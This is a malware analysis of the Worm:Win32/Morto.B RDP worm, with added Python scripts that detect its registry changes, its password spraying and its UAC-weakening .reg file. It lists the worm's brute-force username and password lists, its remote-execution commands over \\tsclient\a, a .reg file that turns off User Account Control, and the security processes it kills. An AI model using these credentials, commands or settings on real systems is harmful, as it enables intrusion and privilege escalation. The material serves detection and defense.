Worm:Win32/Morto.B is a worm that allows unauthorized access to an affected computer. It spreads by guessing administrator and other account passwords for Remote Desktop connections to computers on the same network.
Installation
Worm:Win32/Morto.B consists of several components, including the following:
- An executable dropper component (the installer)
- The encrypted binary blob payload stored in the Windows Registry
- A DLL component, which performs the payload
When the dropper is executed, the DLL component is installed as the following files:
- %windir%\clb.dll
- %windir%\offline web pages\cache.txt
When the malware updates itself, a backup of the first file is created as "clb.dll.bak".
Note that a legitimate file also named "clb.dll" exists by default in the Windows system folder. Because of the order in which Windows searches for DLLs, the malware copy of "clb.dll" in %windir% is found and run instead of the legitimate file in the system folder.
The dropper also writes the encrypted binary blob to the registry value HKLM\SYSTEM\WPA\md and exits.
Worm:Win32/Morto.B also creates the following file:
- %windir%\temp\ntshrui.dll
It renames the following legitimate files:
- <system folder>\sens.dll to <system folder>\sens32.dll
- <system folder>\ntmssvc.dll to <system folder>\ntmssvc32.dll
Note: <system folder> refers to a variable location that the malware determines by querying the operating system. The default System folder location is C:\Winnt\System32 for Windows 2000 and NT, and C:\Windows\System32 for XP, Vista, and 7.
It then overwrites these renamed files with malicious code.
It also creates the following registry modifications to load its modified DLL files at every Windows start:
In subkey: HKLM\SYSTEM\CurrentControlSet\Services\6to4\Parameters
Sets value: "ServiceDll"
With data: "%windir%\temp\ntshrui.dll"
In subkey: HKLM\SYSTEM\CurrentControlSet\Services\6to4
Sets value: "Description"
With data: "0"
In subkey: HKLM\SYSTEM\CurrentControlSet\Services\Sens
Sets value: "DependOnService"
With data: "0"
In subkey: HKLM\SYSTEM\CurrentControlSet\Services\Sens\Parameters
Sets value: "ServiceDll"
With data: "<system folder>\sens32.dll"
In subkey: HKLM\SYSTEM\CurrentControlSet\Services\NtmsSvc\Parameters
Sets value: "ServiceDll"
With data: "<system folder>\NtmsSvc32.dll"
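The file drops and ServiceDll changes listed above can be turned into a host check. The following Python is an added example and is not part of the Microsoft write-up: it compares ServiceDll values, as they would be read from each service's Parameters subkey, against a baseline captured from a clean host, and looks for the dropped and renamed files. The baseline mapping, the sample infected values and the directory listing are constructed for the example, and it assumes C:\Windows as %windir%; on a live host both inputs would be read from the registry and the file system.

```python
import ntpath

# Assumed locations for the example: %windir% and the <system folder> from the
# write-up. On a live host take them from the environment instead.
WINDIR = r"C:\Windows"
SYSTEM_FOLDER = ntpath.join(WINDIR, "System32")

# Files the write-up lists as dropped, renamed or backed up by the worm.
FILE_INDICATORS = [
    ntpath.join(WINDIR, "clb.dll"),
    ntpath.join(WINDIR, "clb.dll.bak"),
    ntpath.join(WINDIR, "offline web pages", "cache.txt"),
    ntpath.join(WINDIR, "temp", "ntshrui.dll"),
    ntpath.join(SYSTEM_FOLDER, "sens32.dll"),
    ntpath.join(SYSTEM_FOLDER, "ntmssvc32.dll"),
]

# Constructed baseline: ServiceDll values as exported from a clean host of the
# same Windows version (assumption for the example; build your own from a
# known-good machine).
BASELINE_SERVICE_DLLS = {
    "6to4": r"%SystemRoot%\System32\6to4svc.dll",
    "Sens": r"%SystemRoot%\System32\sens.dll",
    "NtmsSvc": r"%SystemRoot%\System32\ntmssvc.dll",
    "Dhcp": r"%SystemRoot%\System32\dhcpcsvc.dll",
}

# Constructed values as they would read on an infected host, taken from the
# registry modifications listed above (Dhcp left untouched for contrast).
INFECTED_SERVICE_DLLS = {
    "6to4": r"%windir%\temp\ntshrui.dll",
    "Sens": r"<system folder>\sens32.dll",
    "NtmsSvc": r"<system folder>\NtmsSvc32.dll",
    "Dhcp": r"%SystemRoot%\System32\dhcpcsvc.dll",
}

# Constructed directory listing of a host where the worm's clb.dll shadows the
# legitimate one and sens.dll has been renamed.
SAMPLE_PATHS = [
    r"C:\Windows\clb.dll",
    r"C:\Windows\System32\clb.dll",
    r"C:\WINDOWS\system32\SENS32.DLL",
    r"C:\Windows\System32\sens.dll",
    r"C:\Windows\regedit.exe",
]


def expand(path):
    """Resolve the environment strings and the write-up's <system folder> placeholder."""
    return (path.replace("%SystemRoot%", WINDIR)
                .replace("%windir%", WINDIR)
                .replace("<system folder>", SYSTEM_FOLDER))


def _same(a, b):
    # Windows paths compare case-insensitively.
    return ntpath.normcase(a) == ntpath.normcase(b)


def check_service_dlls(service_dlls, baseline):
    """Return (service, reason) pairs for every ServiceDll that lives outside the
    system folder or differs from the baseline for that service."""
    findings = []
    prefix = ntpath.normcase(SYSTEM_FOLDER) + "\\"
    for svc, dll in service_dlls.items():
        actual = expand(dll)
        if not ntpath.normcase(actual).startswith(prefix):
            findings.append((svc, "ServiceDll outside the system folder: " + dll))
        expected = baseline.get(svc)
        if expected is not None and not _same(expand(expected), actual):
            findings.append((svc, f"ServiceDll changed from {expected} to {dll}"))
    return findings


def check_files(present_paths):
    """Return the indicator paths that appear in present_paths (case-insensitive)."""
    present = {ntpath.normcase(p) for p in present_paths}
    return [p for p in FILE_INDICATORS if ntpath.normcase(p) in present]


if __name__ == "__main__":
    for svc, why in check_service_dlls(INFECTED_SERVICE_DLLS, BASELINE_SERVICE_DLLS):
        print(f"[service] {svc}: {why}")
    for path in check_files(SAMPLE_PATHS):
        print(f"[file] {path}")
```

The baseline comparison is what catches the renamed sens32.dll and NtmsSvc32.dll, since both still sit inside the system folder; the "outside the system folder" rule alone only catches the 6to4 service pointing into %windir%\temp.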
Spreads via...
Network access via RDP port 3389
Worm:Win32/Morto.B enumerates IP addresses on the affected computer's subnet and attempts to connect to these computers using the following user names and passwords:
User name: "administrator"
Passwords:
- !@#$
- !@#$%
- !@#$%^
- !@#$%^&*
- <user name>
- <user name>1
- <user name>111111
- <user name>12
- <user name>123
- <user name>1234
- <user name>123456
- 0
- 000000
- 1
- 111
- 1111
- 111111
- 1111111
- 111222
- 112233
- 11223344
- 12
- 121212
- 123
- 123123
- 123321
- 12344321
- 12345
- 123456
- 1234567
- 12345678
- 123456789
- 1234567890
- 1234qwer
- 1313
- 1314520
- 159357
- 168168
- 1QAZ
- 1q2w3e
- 1qaz2wsx
- 2010
- 2011
- 2012
- 2222
- 22222222
- 3
- 31415926
- 369
- 4321
- 520
- 520520
- 654321
- 666666
- 7
- 7777
- 7777777
- 77777777
- 789456
- 888888
- 88888888
- 987654
- 987654321
- 999999
- PASSWORD
- Password
- Z1234
- a
- aaa
- abc
- abc123
- abcd
- abcd1234
- admin
- admin123
- computer
- dragon
- iloveyou
- letmein
- pass
- password
- princess
- qazwsx
- rockyou
- root
- secret
- server
- super
- test
- user
- zxcvbnm
User name: "user"
Passwords:
- $1234
- <user name>
- <user name>12
- <user name>1234
- 0
- 000000
- 1
- 111
- 1111
- 111111
- 123
- 123123
- 123321
- 12345
- 123456
- 1234567
- 12345678
- 123456789
- 1234567890
- 1234qwer
- 1q2w3e
- 1qaz2wsx
- 369
- 520520
- 654321
- 888888
- a
- aaa
- abc123
- abcd1234
- admin123
- letmein
- pass
- password
- server
- test
User names: "user1" and "test"
Passwords:
- <user name>
- <user name>1234
- 0
- 1
- 111
- 1111
- 111111
- 123
- 123123
- 123321
- 1234
- 12345
- 123456
- 12345678
- 123456789
- 1qaz2wsx
- 888888
- a
- abc123
- letmein
- pass
- password
- server
- test
User names: "user2", "test1", "user3", and "admin1"
Passwords:
- <user name>
- 1
- 111111
- 123
- 1234
- 12345
- 123456
- 12345678
- 1qaz2wsx
- letmein
- password
- server
User names:
- 1
- 123
- a
- actuser
- adm
- admin2
- aspnet
- backup
- console
- david
- guest
- john
- owner
- root
- server
- sql
- support
- support_388945a0
- sys
- test2
- test3
- user4
- user5
Passwords:
- <user name>
- 1
- 123
- 1234
- 123456
- password
where "<user name>" is the user name being used in the combination.
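The credential lists above describe a password spray against a fixed set of account names. From the defender's side this shows up in the Security log as a burst of failed RemoteInteractive logons (event 4625 with LogonType 10) from one source address against several accounts. The following Python is an added example, not part of the Microsoft write-up: it runs a sliding-window count over a constructed set of event records, flags sources that match the pattern, and then checks whether a flagged source later produced a successful RDP logon (event 4624). The event records, the simplified field names and the thresholds are assumptions made for the example; a real feed would come from the event log or a SIEM.

```python
from datetime import datetime, timedelta

# Constructed Security-log records (not real telemetry). The fields mirror
# event 4625/4624: TargetUserName, IpAddress, LogonType. LogonType 10 is
# RemoteInteractive, i.e. a Remote Desktop session.
SAMPLE_EVENTS = [
    {"time": "2011-08-28T10:00:01", "id": 4625, "user": "administrator", "ip": "10.0.0.23", "logon_type": 10},
    {"time": "2011-08-28T10:00:04", "id": 4625, "user": "administrator", "ip": "10.0.0.23", "logon_type": 10},
    {"time": "2011-08-28T10:00:07", "id": 4625, "user": "administrator", "ip": "10.0.0.23", "logon_type": 10},
    {"time": "2011-08-28T10:00:10", "id": 4625, "user": "administrator", "ip": "10.0.0.23", "logon_type": 10},
    {"time": "2011-08-28T10:00:13", "id": 4625, "user": "user", "ip": "10.0.0.23", "logon_type": 10},
    {"time": "2011-08-28T10:00:16", "id": 4625, "user": "user", "ip": "10.0.0.23", "logon_type": 10},
    {"time": "2011-08-28T10:00:19", "id": 4625, "user": "test", "ip": "10.0.0.23", "logon_type": 10},
    {"time": "2011-08-28T10:00:22", "id": 4625, "user": "admin1", "ip": "10.0.0.23", "logon_type": 10},
    # A network (LogonType 3) failure from the same source: not RDP, ignored here.
    {"time": "2011-08-28T10:00:25", "id": 4625, "user": "administrator", "ip": "10.0.0.23", "logon_type": 3},
    # The spray ends with a successful RDP logon as administrator.
    {"time": "2011-08-28T10:00:35", "id": 4624, "user": "administrator", "ip": "10.0.0.23", "logon_type": 10},
    # A user mistyping their own password twice: one account, below threshold.
    {"time": "2011-08-28T10:02:00", "id": 4625, "user": "jsmith", "ip": "10.0.0.50", "logon_type": 10},
    {"time": "2011-08-28T10:02:10", "id": 4625, "user": "jsmith", "ip": "10.0.0.50", "logon_type": 10},
]


def _ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%dT%H:%M:%S")


def detect_rdp_spray(events, window_seconds=300, min_failures=5, min_users=2):
    """Group failed RDP logons by source address and report each source that,
    within any span of window_seconds, accumulates at least min_failures
    failures spread over at least min_users distinct account names."""
    failures = {}
    for ev in events:
        if ev["id"] == 4625 and ev["logon_type"] == 10:
            failures.setdefault(ev["ip"], []).append((_ts(ev), ev["user"].lower()))
    window = timedelta(seconds=window_seconds)
    alerts = {}
    for ip, attempts in failures.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):
            # Slide the window start forward until it is within window of the end.
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            span = attempts[start:end + 1]
            users = {u for _, u in span}
            if len(span) >= min_failures and len(users) >= min_users:
                best = alerts.get(ip)
                if best is None or len(span) > best["failures"]:
                    alerts[ip] = {"failures": len(span), "users": sorted(users),
                                  "first": span[0][0], "last": span[-1][0]}
    return alerts


def sources_with_later_success(events, alerts):
    """Return flagged sources that produced a successful RDP logon (4624,
    LogonType 10) at or after the end of their flagged window."""
    hits = []
    for ev in events:
        alert = alerts.get(ev["ip"])
        if alert and ev["id"] == 4624 and ev["logon_type"] == 10 and _ts(ev) >= alert["last"]:
            if ev["ip"] not in hits:
                hits.append(ev["ip"])
    return hits


if __name__ == "__main__":
    found = detect_rdp_spray(SAMPLE_EVENTS)
    for ip, info in found.items():
        print(f"{ip}: {info['failures']} failed RDP logons against {info['users']}")
    print("flagged sources that later logged on:", sources_with_later_success(SAMPLE_EVENTS, found))
```

Requiring several distinct account names is what separates this worm's behaviour from a single user who keeps mistyping a password; the thresholds should be tuned to the environment, and a success following a flagged burst is the signal that deserves immediate follow-up on the source host.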
If the worm successfully logs on to a computer, it copies its DLL component "clb.dll" to the accessed computer as "a.dll". It also creates a REG file named "r.reg" in a folder that is mapped to drive A:. Both files are executed remotely from the affected computer using the following commands (\\tsclient\a is the Remote Desktop redirection of the affected computer's drive A:; each command is terminated with a carriage return):
rundll32 \\tsclient\a\a.dll a
regedit /s \\tsclient\a\r.reg
The file r.reg contains the following:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:0
"EnableLUA"=dword:0
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers]
"c:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"d:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"e:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"f:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"g:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"h:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"i:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"d:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"e:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"f:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"g:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"h:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"i:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"c:\\winnt\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\win2008\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\win2k8\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\win7\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\windows7\\system32\\rundll32.exe"="RUNASADMIN"
The REG file modifies the registry so that the legitimate file "rundll32.exe" runs with Administrator privileges: the first key disables User Account Control prompting (EnableLUA and ConsentPromptBehaviorAdmin set to 0), and the second assigns the RUNASADMIN application-compatibility layer to every listed copy of "rundll32.exe". Because the malware DLL file "clb.dll" is run within the context of "rundll32.exe", it runs with Administrator privileges as well.
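A .reg file like the one above can be audited before it is trusted. The following Python is an added example, not part of the Microsoft write-up: it parses the .reg text reproduced from this page into keys and values, then flags the settings that weaken UAC (EnableLUA and ConsentPromptBehaviorAdmin set to 0) and every executable assigned the RUNASADMIN compatibility layer. The parser handles only the string and dword value forms that appear in this file; hex(...) binary data is left as raw text.

```python
import re

# The r.reg content reproduced from the write-up above. A real export would
# start with a "Windows Registry Editor Version 5.00" line, which the parser skips.
R_REG = r'''[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:0
"EnableLUA"=dword:0
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers]
"c:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"d:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"e:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"f:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"g:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"h:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"i:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"d:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"e:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"f:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"g:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"h:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"i:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"c:\\winnt\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\win2008\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\win2k8\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\win7\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\windows7\\system32\\rundll32.exe"="RUNASADMIN"
'''

SECTION_RE = re.compile(r'^\[(.+)\]$')
# "name"=data, where the name may contain backslash-escaped characters.
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')

UAC_POLICY_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
LAYERS_KEY_SUFFIX = r"\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers"


def _unescape(s):
    # .reg strings escape backslash and double quote with a backslash.
    return re.sub(r'\\(.)', r'\1', s)


def decode_data(raw):
    """Decode the value forms used in this file: dword:<hex> and "string"."""
    if raw.startswith("dword:"):
        return int(raw[len("dword:"):], 16)
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return _unescape(raw[1:-1])
    return raw  # hex(...) and other types are left as text


def parse_reg(text):
    """Return {key: {value_name: data}} for a .reg export."""
    keys = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            keys[current][_unescape(m.group(1))] = decode_data(m.group(2))
    return keys


def audit_reg(keys):
    """Flag UAC-disabling policy values and RUNASADMIN compatibility layers.
    Key and value names are compared case-insensitively, as the registry does."""
    findings = []
    policy = next((v for k, v in keys.items() if k.lower() == UAC_POLICY_KEY.lower()), {})
    policy = {name.lower(): data for name, data in policy.items()}
    if policy.get("enablelua") == 0:
        findings.append("EnableLUA=0 turns User Account Control off")
    if policy.get("consentpromptbehavioradmin") == 0:
        findings.append("ConsentPromptBehaviorAdmin=0 elevates administrators without a prompt")
    for key, values in keys.items():
        if key.lower().endswith(LAYERS_KEY_SUFFIX.lower()):
            for exe, layer in values.items():
                if isinstance(layer, str) and "RUNASADMIN" in layer.upper().split():
                    findings.append(f"RUNASADMIN layer set on {exe}")
    return findings


if __name__ == "__main__":
    for finding in audit_reg(parse_reg(R_REG)):
        print(finding)
```

The same audit applied to a clean host's exported policy key (EnableLUA=1, no Layers entries for rundll32.exe) returns no findings, which makes it usable as a quick baseline comparison as well as a review of a suspicious file.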
Payload
Contacts remote host
Worm:Win32/Morto.B connects to the following hosts to download additional information and update its components:
- sc.j<removed>mt.net
- fc<random number>d.j<removed>mt.net
Newly downloaded components are saved as files using the following naming format:
<random characters>~MTMP<4 hexadecimal digits>.exe
Performs denial of service attacks
Worm:Win32/Morto.B may be ordered to perform denial-of-service (DoS) attacks against specified targets.
Terminates security processes
Worm:Win32/Morto.B terminates processes whose names contain any of the following strings. The selected strings indicate that the worm is attempting to stop processes belonging to popular security applications.
- 360rp
- ACAAS
- ArcaConfSV
- AvastSvc
- FPAVServer
- FortiScand
- GDFwSvc
- K7RTScan
- KVSrvXP
- MPSvc
- MsMpEng
- NSESVC.EXE
- PavFnSvr
- RavMonD
- SavService
- SpySweeper
- Vba32Ldr
- a2service
- avguard
- avgwdsvc
- avpmapp
- ccSvcHst
- cmdagent
- coreServiceShell
- freshclam
- fsdfwd
- knsdave
- kxescore
- mcshield
- scanwscs
- vsserv
- zhudongfangyu
Clears system event log
Worm:Win32/Morto.B deletes the following system event logs:
- Application log
- Security log
- System log
Additional information
Worm:Win32/Morto.B stores configuration data in the subkey HKLM\SYSTEM\Wpa using the following registry values:
- HKLM\SYSTEM\Wpa\it
- HKLM\SYSTEM\Wpa\id
- HKLM\SYSTEM\Wpa\sn
- HKLM\SYSTEM\Wpa\ie
- HKLM\SYSTEM\Wpa\md - contains the malware payload code and spreading functionality
- HKLM\SYSTEM\Wpa\sr
It also makes the following registry modification:
In subkey: HKLM\SYSTEM\CurrentControlSet\Control\Windows
Sets value: "NoPopUpsOnBoot"
With data: "1"
It may also target the following services to overwrite with its malicious code:
It contains the version information "2.05".
Analysis by Zarestel Ferrer